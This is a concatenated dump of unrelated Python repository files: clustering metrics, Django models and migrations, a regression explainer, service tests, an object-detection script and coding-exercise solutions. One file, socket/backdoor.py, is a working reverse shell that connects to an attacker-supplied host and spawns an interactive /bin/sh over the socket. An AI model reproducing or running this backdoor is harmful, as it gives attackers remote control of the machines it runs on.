    expected = pairs_u * pairs_v / twocomb(np.sum(sizes_u))
    numerator = float(pair_total) - expected
    denominator = 0.5 * (pairs_u + pairs_v) - expected
    return numerator / denominator
def create_data(groups, rows_per_group):
    """Return a shuffled uint32 vector containing `rows_per_group` copies of
    each group label 0..groups-1.

    Fix: `range(groups) * rows_per_group` only worked on Python 2, where
    range() returned a list; wrapping it in list() makes the repetition
    work on Python 3 as well.
    """
    data = list(range(groups)) * rows_per_group
    dataa = np.array(data, dtype=np.uint32)
    return np.random.permutation(dataa)
def test_rands():
    # Cross-checks the numpy ARI implementation against the Cython
    # fastrand module over a grid of group counts and sizes.
    # NOTE(review): `import fastrand` at the top of this file is commented
    # out, so this test raises NameError as written -- confirm whether
    # fastrand is expected to be importable in the test environment.
    for groups in [10, 100, 500]:
        for rows_per_group in [10, 50, 100]:
            d1 = create_data(groups, rows_per_group)
            d2 = create_data(groups, rows_per_group)
            s1 = assignment_vector_to_list_of_sets(d1)
            s2 = assignment_vector_to_list_of_sets(d2)
            r1 = compute_adj_rand_index_fast(s1, s2)
            r2 = fastrand.compute_adj_rand(d1, d2)
            assert_almost_equal(r1, r2, 2)
def compute_similarity_stats(c1, c2):
    """
    Compute the pair-counting similarity statistics for two clusterings.

    For every unordered pair of items (i1, i2):
      n11 : together in both clusterings
      n00 : separate in both clusterings
      n10 : together in c1 only
      n01 : together in c2 only

    The original visited every ordered pair (both (i, j) and (j, i)) and
    halved the counts at the end; iterating unordered pairs once does half
    the work and returns exact ints, avoiding the Python-2/3 `/` division
    ambiguity (the old code returned floats on Python 3).
    """
    assert len(c1) == len(c2)
    N = len(c1)
    n_00 = 0
    n_01 = 0
    n_10 = 0
    n_11 = 0
    for i1 in range(N):
        for i2 in range(i1 + 1, N):
            together_1 = c1[i1] == c1[i2]
            together_2 = c2[i1] == c2[i2]
            if together_1 and together_2:
                n_11 += 1
            elif not together_1 and not together_2:
                n_00 += 1
            elif together_1 and not together_2:
                n_10 += 1
            else:
                n_01 += 1
    return {'n00' : n_00,
            'n01' : n_01,
            'n10' : n_10,
            'n11' : n_11}
def compute_jaccard(c1, c2):
    """Jaccard similarity of two clusterings: n11 / (n11 + n01 + n10)."""
    stats = compute_similarity_stats(c1, c2)
    agree = stats['n11']
    disagree = stats['n01'] + stats['n10']
    return float(agree) / (agree + disagree)
| [
"jonas@ericjonas.com"
] | jonas@ericjonas.com |
1622c61f3561205e500f996c1495c710ed2f07a5 | 2c19ad0d69a20b2ef82312cdba65fc538c85efe7 | /User/migrations/0006_auto_20190508_1602.py | 4bade3d38cca0e363c3355dd7401f748ed5a9505 | [] | no_license | wzc-ob/EvaluationOfTeaching | b55d1011ca0f36d3af5e32efae85fa251e90fd79 | 783cbd35708db2121566cb27826db3c6654f0871 | refs/heads/master | 2020-06-06T22:40:25.494991 | 2019-06-20T07:06:11 | 2019-06-20T07:06:11 | 192,867,926 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,090 | py | # Generated by Django 2.1.5 on 2019-05-08 08:02
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration: adds basic profile columns to the
    # `teacher` model.  The defaults below are the one-off values Django
    # used to back-fill existing rows.
    dependencies = [
        ('User', '0005_auto_20190508_1514'),
    ]
    operations = [
        migrations.AddField(
            model_name='teacher',
            name='birthday',
            field=models.DateField(default='1969-02-02'),
        ),
        migrations.AddField(
            model_name='teacher',
            name='img',
            field=models.ImageField(blank=True, default='nopic.jpg', upload_to='files'),
        ),
        migrations.AddField(
            model_name='teacher',
            name='name',
            field=models.CharField(default='王老师', max_length=12),
        ),
        migrations.AddField(
            model_name='teacher',
            name='sex',
            field=models.CharField(default='男', max_length=3),
        ),
        migrations.AddField(
            model_name='teacher',
            name='telephone',
            field=models.CharField(default='18772815717', max_length=11),
        ),
    ]
"43775612+wzc-ob@users.noreply.github.com"
] | 43775612+wzc-ob@users.noreply.github.com |
04b2d5f6e25fe54559d1a0d6cc931d0a0e294d04 | 97504159dcdacaef31a81abc2ee326ed95fa8ee3 | /models/order_discount_model.py | 5f50a8797644f858a03f2ab10984300ff90f50d9 | [] | no_license | argeweb/plugin-order | 4200857afe3a45e7d96dd4f5b13c9fe7ecc992b4 | b95882c90e9fe8128834c63ca2ae1ea3b4b14ebe | refs/heads/master | 2020-02-26T15:06:46.883725 | 2018-03-30T01:28:05 | 2018-03-30T01:28:05 | 83,565,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created with YooLiang Technology (侑良科技).
# Author: Qi-Liang Wen (温啓良)
# Web: http://www.yooliang.com/
# Date: 2017/3/1.
import time
from argeweb import BasicModel
from argeweb import Fields
from order_model import OrderModel
class OrderDiscountModel(BasicModel):
    """A single discount line attached to an order."""
    # The order this discount belongs to.
    order = Fields.KeyProperty(verbose_name=u'訂單', kind=OrderModel)
    # Human-readable description of the discount.
    title = Fields.StringProperty(verbose_name=u'折扣說明', default=u'')
    # Discount amount (currency units).
    amount = Fields.FloatProperty(verbose_name=u'折扣金額', default=0.0)
    @classmethod
    def all_with_order(cls, order=None, *args, **kwargs):
        # All discounts for `order`, ordered by descending sort value
        # (`sort` presumably comes from BasicModel).
        # NOTE(review): the order=None default is unusable -- order.key
        # would raise AttributeError; confirm callers always pass an order.
        return cls.query(cls.order==order.key).order(-cls.sort)
| [
"cwen0708@gmail.com"
] | cwen0708@gmail.com |
e6114b117e16485b2ed7dabbdbb936f25a0133aa | 2e7bf2c172b59e7f6fb358bc73687b738e1dbed3 | /python/interpret/perf/regression.py | 612c6920121ba61286fed23152b0aba5a915a189 | [
"MIT"
] | permissive | rodrigovssp/interpret | 58ec3a01a3621421e0b60aee76df282d11dcf48b | dbd0e2dd616f963c14184ea6ec442bacd8d92400 | refs/heads/master | 2020-07-20T17:19:55.161052 | 2019-11-22T01:28:17 | 2019-11-22T01:28:17 | 206,683,287 | 1 | 0 | MIT | 2019-09-06T00:54:48 | 2019-09-06T00:54:48 | null | UTF-8 | Python | false | false | 2,998 | py | # Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
from ..api.base import ExplainerMixin, ExplanationMixin
from ..utils import unify_data, gen_name_from_class, unify_predict_fn
from sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score
import numpy as np
class RegressionPerf(ExplainerMixin):
    """Produces regression performance explanations (residual analysis)."""
    available_explanations = ["perf"]
    explainer_type = "perf"
    def __init__(self, predict_fn, feature_names=None, feature_types=None, **kwargs):
        # predict_fn: callable mapping X -> predicted scores; feature
        # names/types may be inferred later by unify_data in explain_perf.
        self.predict_fn = predict_fn
        self.kwargs = kwargs
        self.feature_names = feature_names
        self.feature_types = feature_types
    def explain_perf(self, X, y, name=None):
        """Compute MSE/RMSE/MAE/R2 and a residual histogram for (X, y),
        returned wrapped in a RegressionExplanation."""
        if name is None:
            name = gen_name_from_class(self)
        X, y, self.feature_names, self.feature_types = unify_data(
            X, y, self.feature_names, self.feature_types
        )
        predict_fn = unify_predict_fn(self.predict_fn, X)
        scores = predict_fn(X)
        mse = mean_squared_error(y, scores)
        rmse = np.sqrt(mse)
        mae = mean_absolute_error(y, scores)
        r2 = r2_score(y, scores)
        residuals = y - scores
        # abs_residuals = np.abs(y - scores)
        # Doane's rule picks the histogram bin count for the residuals.
        counts, values = np.histogram(residuals, bins="doane")
        overall_dict = {
            "type": "perf_curve",
            "density": {"names": values, "scores": counts},
            "scores": scores,
            "mse": mse,
            "rmse": rmse,
            "mae": mae,
            "r2": r2,
            "residuals": residuals,
        }
        internal_obj = {"overall": overall_dict, "specific": None}
        return RegressionExplanation(
            "perf",
            internal_obj,
            feature_names=self.feature_names,
            feature_types=self.feature_types,
            name=name,
        )
class RegressionExplanation(ExplanationMixin):
explanation_type = None
def __init__(
self,
explanation_type,
internal_obj,
feature_names=None,
feature_types=None,
name=None,
selector=None,
):
self.explanation_type = explanation_type
self._internal_obj = internal_obj
self.feature_names = feature_names
self.feature_types = feature_types
self.name = name
self.selector = selector
def data(self, key=None):
if key is None:
return self._internal_obj["overall"]
return None
def visualize(self, key=None):
from ..visual.plot import plot_density
data_dict = self.data(key)
if data_dict is None:
return None
rmse = data_dict["rmse"]
r2 = data_dict["r2"]
title = "{0} <br> RMSE = {1:.2f}" + " | R<sup>2</sup> = {2:.2f}"
title = title.format(self.name, rmse, r2)
density_fig = plot_density(
data_dict["density"], title=title, xtitle="Residuals", ytitle="Density"
)
return density_fig
| [
"interpretml@outlook.com"
] | interpretml@outlook.com |
90f6c43e4d795ce0d9d1b36dac534bc62b5b7896 | 06ff4c9b61578823f7fac8d52b67ea0dbaf69665 | /bic_index/__init__.py | cd87dd7dff0ad3ca7aef0f0416d57d911d7f2c9d | [
"MIT"
] | permissive | horta/bic-index | 671e4b2fd14f52ce0ac46b41db62bd257bf93d1a | 849a52812d6e8ed1c23ffa20e5199711ce809aa2 | refs/heads/master | 2020-06-01T11:31:15.376758 | 2019-06-09T13:54:05 | 2019-06-09T13:54:05 | 190,764,476 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 857 | py | """
Biclustering indices
Similarity measures for comparing biclustering solutions.
"""
from ._anne import anne_rnia
from ._ayadi import ayadi
from ._bozdag import bozdag_extra, bozdag_uncovered
from ._csi import csi
from ._ebc import ebc
from ._eren import eren_recovery, eren_relevance
from ._error import biclustering_error
from ._fabia import fabia
from ._lew import lew
from ._prelic import prelic_recovery, prelic_relevance
from ._stmaria import stmaria
from ._testit import test
from ._w import wdic, wjac
__version__ = "0.0.1"
__all__ = [
"__version__",
"anne_rnia",
"ayadi",
"biclustering_error",
"bozdag_extra",
"bozdag_uncovered",
"csi",
"ebc",
"eren_recovery",
"eren_relevance",
"fabia",
"lew",
"prelic_recovery",
"prelic_relevance",
"stmaria",
"test",
"wdic",
"wjac",
]
| [
"danilo.horta@gmail.com"
] | danilo.horta@gmail.com |
a685bf18fd3fee1b3518a28a9032d2900d823215 | beb9ac9ed895b375fbea240bf7d56281d6a0a481 | /20200720/test6.py | 77549574c1392e64ab03417146f5243dce61a00d | [] | no_license | MinjeongSuh88/python_workspace | 5b0c7e2a7b3543e65df1f07066e4a52f23294ac5 | b13afdc8cf4e42496fa2b5c8df3c5effc7f7488d | refs/heads/master | 2022-11-30T11:05:52.347243 | 2020-08-14T09:04:42 | 2020-08-14T09:04:42 | 285,185,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | # 사용자로부터 국어, 수학, 영어 점수를 입력받아 합계, 평균을 구하고 등급 매기기
kor,mat,eng=input("국어, 수학, 영어 점수를 입력하시오").split()
total=int(kor)+int(mat)+int(eng)
ave=total/3
print(total, ave)
if ave >= 90:
print('총점 :',total,', 평균 :',ave,', 당신의 학점은 A')
elif ave >= 80:
print('총점 :',total,', 평균 :',ave,', 당신의 학점은 B')
elif ave >= 70:
print('총점 :',total,', 평균 :',ave,', 당신의 학점은 C')
elif ave >= 60:
print('총점 :',total,', 평균 :',ave,', 당신의 학점은 D')
else:
print('당신의 학점은')
| [
"69196506+MinjeongSuh88@users.noreply.github.com"
] | 69196506+MinjeongSuh88@users.noreply.github.com |
a93dd5b8d10a589e061e9b9519f5ca1f58befe2b | f3c33b6a9270d53d8cb657f3bb1912938edd6c39 | /js/nextdates.py | d6fcf479b41e02b430d8f336e95e214d388389eb | [] | no_license | ivanteoh/sypy.github.com | 5742685c2ab9a740623ae58851946bc278b16499 | 31487a991143eea26d37ec23e7915a6d86dbd834 | refs/heads/master | 2021-01-24T21:08:21.060830 | 2015-09-03T05:52:16 | 2015-09-03T05:52:16 | 39,477,784 | 0 | 0 | null | 2015-07-22T01:06:26 | 2015-07-22T01:06:25 | null | UTF-8 | Python | false | false | 685 | py | from datetime import datetime
import calendar
import math
now = datetime.now()
def next_date(week, day_of_week):
year, month = (now.year, now.month)
day = calendar.monthcalendar(now.year, now.month)[week][day_of_week]
if now.day > day:
year = int(2014 + math.floor(11/12))
month = now.month % 12 + 1
day = calendar.monthcalendar(year, month)[week][day_of_week]
return datetime(year, month, day, 18, 30)
nights = [('SyPy', 0, 3), ('Hacknight', 2, 1), ('SyDjango', 3, 3)]
for date, event in sorted([(next_date(week, day), event) for event, week, day in nights]):
print("Next %s:\t%s" % (event, date))
# developed at hacknight 2014-10-16
| [
"software@pretaweb.com"
] | software@pretaweb.com |
7fc29cf7195d9833782774d8fc92c5bddf59e5ae | 0b0ba6de1808c4214ccb1f39077c7f59d939b059 | /python/samples/hhAnalyzeSamples_2016_nanoAOD_sync.py | 03b0a86398c5cf82c9b412f064342c938225c0db | [] | no_license | HEP-KBFI/hh-bbww | b1e434994764d294459208e7515d4e8ad29b3ecd | 7e03769356d21bfe3597d2e0cba7ceeb2a73e62c | refs/heads/master | 2023-04-30T16:12:26.824547 | 2023-04-24T17:38:02 | 2023-04-24T17:38:02 | 149,094,236 | 2 | 4 | null | 2022-09-09T10:59:47 | 2018-09-17T08:37:12 | Python | UTF-8 | Python | false | false | 2,101 | py | from collections import OrderedDict as OD
# file generated at 2020-03-03 10:45:15 with the following command:
# create_dictionary.py -m python/samples/metaDict_2016_hh_sync.py -p /local/karl/sync_ntuples/2016/nanoAODproduction/2019Dec06 -N samples_2016 -E 2016 -o python/samples -g hhAnalyzeSamples_2016_nanoAOD_sync.py -M
samples_2016 = OD()
samples_2016["/GluGluToRadionToHHTo2B2VTo2L2Nu_M-750_narrow_13TeV-madgraph-v2/RunIISummer16MiniAODv3-PUMoriond17_94X_mcRun2_asymptotic_v3-v2/MINIAODSIM"] = OD([
("type", "mc"),
("sample_category", "signal"),
("process_name_specific", "signal_ggf_spin0_750_hh_2b2v"),
("nof_files", 1),
("nof_db_files", 3),
("nof_events", {
}),
("nof_tree_events", 144981),
("nof_db_events", 298727),
("fsize_local", 361661929), # 361.66MB, avg file size 361.66MB
("fsize_db", 13966996917), # 13.97GB, avg file size 4.66GB
("use_it", True),
("xsection", 0.027654),
("genWeight", True),
("triggers", ['1e', '1mu', '2e', '2mu', '1e1mu', '3e', '3mu', '2e1mu', '1e2mu', '1e1tau', '1mu1tau', '2tau']),
("has_LHE", True),
("nof_PSweights", 1),
("LHE_set", "LHA IDs 262000 - 262100 -> NNPDF30_lo_as_0130 PDF set, expecting 101 weights (counted 101 weights)"),
("nof_reweighting", 0),
("local_paths",
[
OD([
("path", "/local/karl/sync_ntuples/2016/nanoAODproduction/2019Dec06/signal_ggf_spin0_750_hh_2b2v"),
("selection", "*"),
("blacklist", []),
]),
]
),
("missing_completely", [
# not computed
]),
("missing_from_superset", [
# not computed
]),
("missing_hlt_paths", [
]),
("hlt_paths", [
# not computed
]),
])
samples_2016["sum_events"] = [
]
| [
"karlehataht@gmail.com"
] | karlehataht@gmail.com |
f65ac26d969168699050a86ebdd004165c00bad7 | 017ca2cfff50c9bb4865cba3ae6e765b4df83190 | /tests/test_app.py | 7548042caac5fea22c56b64e581544f1ffb4d90b | [] | no_license | cjrh/venus | d011bebb3185107d6ac326a03a2b4fad258a4e42 | 961287ea4fcaa80bf67371df9b6588155ef625a8 | refs/heads/master | 2021-06-11T08:18:15.648241 | 2021-04-23T05:08:31 | 2021-04-23T05:08:31 | 178,842,174 | 0 | 0 | null | 2021-04-23T05:08:33 | 2019-04-01T10:43:46 | Python | UTF-8 | Python | false | false | 2,926 | py | import asyncio
import os
import signal
import subprocess as sp
import sys
import time
from pprint import pprint
from uuid import uuid4
import biodome
import portpicker
import pytest
from asyncpg import Connection
def cross_platform_process_terminator(proc: sp.Popen):
if sys.platform == 'win32':
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGTERM)
def cross_platform_creation_flags():
if sys.platform == 'win32':
return sp.CREATE_NEW_PROCESS_GROUP
else:
return 0
@pytest.fixture(scope='module')
def venus_runner(db_fixture):
"""This is the venus application"""
port = portpicker.pick_unused_port()
env = {**os.environ, **{k: str(v) for k, v in dict(MAX_BATCH_SIZE=1).items()}}
proc = sp.Popen(['venus', '--zmqport', str(port)], env=env,
creationflags=cross_platform_creation_flags())
try:
yield proc, port
finally:
print('Killing venus')
cross_platform_process_terminator(proc)
try:
proc.wait(timeout=2.0)
except sp.TimeoutExpired:
print('Process did not shutdown in 2 seconds. Killing.')
proc.kill()
def run_app(port, iterations, delay=0.2, env=None):
"""This is a fake microservice"""
if env:
env = {**os.environ, **env}
proc = sp.Popen([f'{sys.executable}', 'tests/sender.py',
'-p', f'{port}',
'-i', f'{iterations}',
'-d', f'{delay}'
], env=env,
creationflags=cross_platform_creation_flags(),
)
return proc
def test_send_logs(db_fixture, db_pool_session, venus_runner):
proc_venus, port = venus_runner
# Give it a moment to start up
time.sleep(1)
message_uuids = [str(uuid4()) for i in range(10)]
env = dict(SENDER_ITEMS=str(message_uuids))
with biodome.env_change('MAX_BATCH_SIZE', 1):
proc_app = run_app(port, iterations=10, env=env)
try:
proc_app.wait(10)
except sp.TimeoutExpired:
print('Fake app still not finished. Killing.')
cross_platform_process_terminator(proc_app)
# Fetch records from the DB to verify that the log messages arrived.
async def get():
# Cannot use the db_pool fixture, because it mutates the
# db.DATABASE_POOL global, which is what main.amain *also* does.
async with db_pool_session.acquire() as conn:
conn: Connection
return await conn.fetch('SELECT * FROM logs')
loop = asyncio.get_event_loop()
records = loop.run_until_complete(get())
pprint(records)
logged_message_ids = {r['message'] for r in records}
print('logged:', logged_message_ids)
print('expected:', message_uuids)
assert logged_message_ids.issuperset(message_uuids)
| [
"caleb.hattingh@gmail.com"
] | caleb.hattingh@gmail.com |
2bdafa18c0708627394a434ab0414269d1abe63d | 6045075c734d65a3cec63d3ae15f8f9f13836559 | /solutions/0397_Integer_Replacement/math.py | 32709a4dc2322dd0c95365874f0fdffd2ecbb39f | [] | no_license | zh-wang/leetcode | c058470fdf84fb950e3d4f974b27826718942d05 | 6322be072e0f75e2da28b209c1dbb31593e5849f | refs/heads/master | 2021-12-28T02:49:11.964213 | 2021-08-25T06:29:21 | 2021-08-25T06:29:21 | 189,919,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | class Solution:
def integerReplacement(self, n: int) -> int:
cnt = 0
while n > 1:
if n % 2 == 0: # half n when n is even
n >>= 1
# every odd integer mod 4 is either 1 or 3
elif n == 3 or n % 4 == 1:
n -= 1
else:
n += 1
cnt += 1
return cnt
| [
"viennakanon@gmail.com"
] | viennakanon@gmail.com |
0ad82150a6438039d05ec42973e02c3791d07064 | 3a48e3469239ce17b4f01b98b85e052faf137ab0 | /unittestdemo/test_testloader.discover.py | 1086acda8b46cc3522d0fdd845a26cb5cd4708b6 | [] | no_license | langdawang678/Py | 3b6887bb7840ec73ee750e69f5c0f2988730746d | 7f0863a245fc51a1dd07d2c8954eac67b55daac2 | refs/heads/master | 2021-07-17T22:03:01.177913 | 2021-07-14T14:01:16 | 2021-07-14T14:01:16 | 174,823,049 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py | """
演示unittest.TestLoader().discover()方法
测试用例执行步骤
1、初始化加载器,testloader=unittest.TestLoader()
2、查找测试用例,suite=testloader.discover(文件夹,默认test开头) # 也可'test*.py'
还有其他加载的方式:
3、打开一个文件,用于存放text报告
4、初始化运行器,runner = unittest.TextTestRunner(文件)
5、运行运行器, runner.run(suite)
"""
import unittest
testLoader = unittest.TestLoader()
suite = testLoader.discover(".", "test_math*.py")
print(suite)
if __name__ == '__main__':
with open("TextTestRunner_test_math*.py.txt", "w") as f:
runner = unittest.TextTestRunner(f, verbosity=2)
runner.run(suite)
| [
"langdawang678@sina.com"
] | langdawang678@sina.com |
e7c8acf1628cb0f95a00e249c40a5288e89d5d03 | f75f841a1e0e6e7915a68bebbed7233aa5d22625 | /socket/backdoor.py | b84991ed8a2899792ba542f4637c60bd9e3500f5 | [
"MIT"
] | permissive | Akagi201/learning-python | 4c1aa72116cdfea527fdf2afd038158e5ba7f97b | 28169d1bf0488e8be1456b40dd39d7830a65280e | refs/heads/master | 2022-12-08T01:25:57.842615 | 2022-03-14T08:02:20 | 2022-03-14T08:02:20 | 32,675,802 | 89 | 126 | MIT | 2022-11-24T18:20:28 | 2015-03-22T13:04:01 | Python | UTF-8 | Python | false | false | 501 | py | # coding=utf-8
# run:
# nc -l 8888
# python 127.0.0.1 8888
import socket, subprocess, os, sys
if len(sys.argv) < 3:
print("Usage: python xxx.py ip port")
exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
# IP: sys.argv[1], the remote host
# PORT: sys.argv[2], the same port as used by the server
s.connect((sys.argv[1], int(sys.argv[2])))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
| [
"akagi201@gmail.com"
] | akagi201@gmail.com |
7cca2c1fd1067e7eb7245c0c4e8ebbd3b6f46751 | 6550cc368f029b3955261085eebbddcfee0547e1 | /第6部分-Django(哪吒,肖锋)/django-4-权限管理-肖锋/day82/day82/luffy_permission-权限信息展示/luffy_permission/rbac/urls.py | 63ffc11c1ccba1db26adec3b227b2286bd13f0ca | [] | no_license | vividyellow/oldboyeduPython14qi | d00c8f45326e16464c3d4e8df200d93779f68bd3 | de1e9f6efafa2846c068b3fe5ad6e1ca19f74a11 | refs/heads/master | 2022-09-17T21:03:17.898472 | 2020-01-31T10:55:01 | 2020-01-31T10:55:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | from django.conf.urls import url
from rbac import views
urlpatterns = [
# /app01/role/list/ # rbac:role_list
url(r'^role/list/$', views.role_list, name='role_list'),
url(r'^role/add/$', views.role, name='role_add'),
url(r'^role/edit/(\d+)$', views.role, name='role_edit'),
url(r'^role/del/(\d+)$', views.del_role, name='role_del'),
url(r'^menu/list/$', views.menu_list, name='menu_list'),
url(r'^menu/add/$', views.menu, name='menu_add'),
url(r'^menu/edit/(\d+)$', views.menu, name='menu_edit'),
]
| [
"524991368@qq.com"
] | 524991368@qq.com |
76670d6cc29244caf6a20fec00e61bbb9d6304d1 | ca68d2f60d6c05c7b51e8a1dd68e3db05a7fda39 | /pycon.jp/pyconjp-csv-dump.py | bacab7ba77de0d0f4d4be230e5a230839e0e3c3a | [] | no_license | sin-tanaka/happy-scraping | 352c10f3d6c3ff1e3074a886dd7ca0fbf9ad6064 | 84ca05ea3e5a6233897d0c77d28c861ea4c0223e | refs/heads/master | 2020-05-23T22:22:33.255888 | 2015-12-05T11:15:21 | 2015-12-05T11:15:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import csv
import bs4
import requests
url = 'https://pycon.jp/2015/ja/schedule/tutorials/list/'
res = requests.get(url)
soup = bs4.BeautifulSoup(res.text)
titles = [(elm.text, elm.get('href')) for elm in soup.select('.presentation h3 a')]
fp = open('test.csv', 'w+t')
writer = csv.writer(fp)
writer.writerows(titles)
fp.close()
| [
"takesxi.sximada@gmail.com"
] | takesxi.sximada@gmail.com |
5fe6b8d92c33a20c1ac4b997a704f1e36ae1c3a4 | b6d48defc1d5359ee351403b0906b6beb6cb64a7 | /Yet-Another-EfficientDet-Pytorch/efficientdet_test.py | 278bd08eed0241c05001b29254cbdc30c22e82a3 | [
"LGPL-3.0-only",
"Apache-2.0"
] | permissive | CrazyVertigo/SimpleCVReproduction | 2c6d2d23b0e234d976eefbdb56d6460798559b0d | 9699f600e6cde89ad0002ca552f8b6119e96990c | refs/heads/master | 2022-09-24T16:29:33.263625 | 2020-06-03T14:53:18 | 2020-06-03T14:53:18 | 269,344,314 | 1 | 0 | Apache-2.0 | 2020-06-04T11:43:10 | 2020-06-04T11:43:09 | null | UTF-8 | Python | false | false | 4,161 | py | # Author: Zylo117
"""
Simple Inference Script of EfficientDet-Pytorch
"""
import time
import torch
from backbone import EfficientDetBackbone
import cv2
import numpy as np
from efficientdet.utils import BBoxTransform, ClipBoxes
from utils.utils import preprocess, invert_affine, postprocess
compound_coef = 0
force_input_size = 1920 # set None to use default size
img_path = 'test/img.png'
threshold = 0.2
iou_threshold = 0.2
use_cuda = True
use_float16 = False
obj_list = ['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', '', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep',
'cow', 'elephant', 'bear', 'zebra', 'giraffe', '', 'backpack', 'umbrella', '', '', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove',
'skateboard', 'surfboard', 'tennis racket', 'bottle', '', 'wine glass', 'cup', 'fork', 'knife', 'spoon',
'bowl', 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut',
'cake', 'chair', 'couch', 'potted plant', 'bed', '', 'dining table', '', '', 'toilet', '', 'tv',
'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster', 'sink',
'refrigerator', '', 'book', 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier',
'toothbrush']
# tf bilinear interpolation is different from any other's, just make do
input_sizes = [512, 640, 768, 896, 1024, 1280, 1280, 1536]
input_size = input_sizes[compound_coef] if force_input_size is None else force_input_size
ori_imgs, framed_imgs, framed_metas = preprocess(img_path, max_size=input_size)
x = torch.tensor(framed_imgs).cuda()
if use_cuda:
x = torch.stack([torch.from_numpy(fi).cuda() for fi in framed_imgs], 0)
else:
x = torch.stack([torch.from_numpy(fi) for fi in framed_imgs], 0)
x = x.to(torch.float32 if not use_float16 else torch.float16).permute(0, 3, 1, 2)
model = EfficientDetBackbone(compound_coef=compound_coef, num_classes=len(obj_list))
model.load_state_dict(torch.load(f'weights/efficientdet-d{compound_coef}.pth'))
model.requires_grad_(False)
model.eval()
if use_cuda:
model = model.cuda()
if use_float16:
model = model.half()
with torch.no_grad():
features, regression, classification, anchors = model(x)
regressBoxes = BBoxTransform()
clipBoxes = ClipBoxes()
out = postprocess(x,
anchors, regression, classification,
regressBoxes, clipBoxes,
threshold, iou_threshold)
def display(preds, imgs, imshow=True, imwrite=False):
for i in range(len(imgs)):
if len(preds[i]['rois']) == 0:
continue
for j in range(len(preds[i]['rois'])):
(x1, y1, x2, y2) = preds[i]['rois'][j].astype(np.int)
cv2.rectangle(imgs[i], (x1, y1), (x2, y2), (255, 255, 0), 2)
obj = obj_list[preds[i]['class_ids'][j]]
score = float(preds[i]['scores'][j])
cv2.putText(imgs[i], '{}, {:.3f}'.format(obj, score),
(x1, y1 + 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(255, 255, 0), 1)
if imshow:
cv2.imshow('img', imgs[i])
cv2.waitKey(0)
if imwrite:
cv2.imwrite(f'test/img_inferred_d{compound_coef}_this_repo_{i}.jpg', imgs[i])
out = invert_affine(framed_metas, out)
display(out, ori_imgs, imshow=False, imwrite=True)
print('running speed test...')
print('inferring image for 10 times...')
with torch.no_grad():
t1 = time.time()
for _ in range(10):
_, regression, classification, anchors = model(x)
out = postprocess(x,
anchors, regression, classification,
regressBoxes, clipBoxes,
threshold, iou_threshold)
out = invert_affine(framed_metas, out)
t2 = time.time()
tact_time = (t2 - t1) / 10
print(f'{tact_time} seconds, {1 / tact_time} FPS, @batch_size 1')
| [
"1115957667@qq.com"
] | 1115957667@qq.com |
4c1558020a925591526dba739b3b46af07ba9307 | 65b4522c04c2be071c2d42095956fe950fe1cebe | /inversions/static_inversion/static_inversion2/occam_for_rake_no_seafloor/run1/slip0/plot_slip.py | 89a534bddf2e16da7f37a1ce25c633ddde142466 | [] | no_license | geodesy/viscojapan | ac0cd93f7a2134cd2651623b94879dcc21c0c46a | 03e70265b56eb5994e73bcb6066f0be338e42f27 | refs/heads/master | 2021-03-03T18:19:07.779601 | 2015-07-16T03:50:49 | 2015-07-16T03:50:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | import viscojapan as vj
mplt = vj.plots.MapPlotFault('../../../fault_model/fault_bott60km.h5')
mplt.plot_slip_file('slip0.h5',0)
vj.plots.plt.savefig('initial_slip_input.png')
vj.plots.plt.show()
| [
"zy31415@gmail.com"
] | zy31415@gmail.com |
6246c7a30ce3f69a4b0a6b6d1afd3b28493dd43f | b3f6daa5d6c987eb8a61d5fe125bf2a98997e259 | /8kyu/Multiplication table for number/index.py | 1f321270b077646deb2dd5ef0a6e0be9bc926544 | [] | no_license | krnets/codewars-practice | 53a0a6c9d2d8c2b94d6799a12f48dd588179a5ce | 5f8e1cc1aebd900b9e5a276884419fc3e1ddef24 | refs/heads/master | 2022-12-20T19:33:43.337581 | 2022-12-16T05:32:39 | 2022-12-16T05:32:39 | 217,464,785 | 1 | 0 | null | 2020-07-20T08:36:31 | 2019-10-25T06:20:41 | JavaScript | UTF-8 | Python | false | false | 934 | py | # 8kyu - Multiplication table for number
""" Your goal is to return multiplication table for number that is always an integer from 1 to 10.
For example, a multiplication table (string) for number == 5 looks like below:
1 * 5 = 5
2 * 5 = 10
3 * 5 = 15
4 * 5 = 20
5 * 5 = 25
6 * 5 = 30
7 * 5 = 35
8 * 5 = 40
9 * 5 = 45
10 * 5 = 50
P. S. You can use \n in string to jump to the next line. """
# def multi_table(n):
# res = ''
# for i in range(1, 11):
# res += f'{str(i)} * {n} = {str(i * n)}\n'
# return res.rstrip()
def multi_table(number):
return '\n'.join(f'{i} * {number} = {i * number}' for i in range(1, 11))
q = multi_table(5)
q
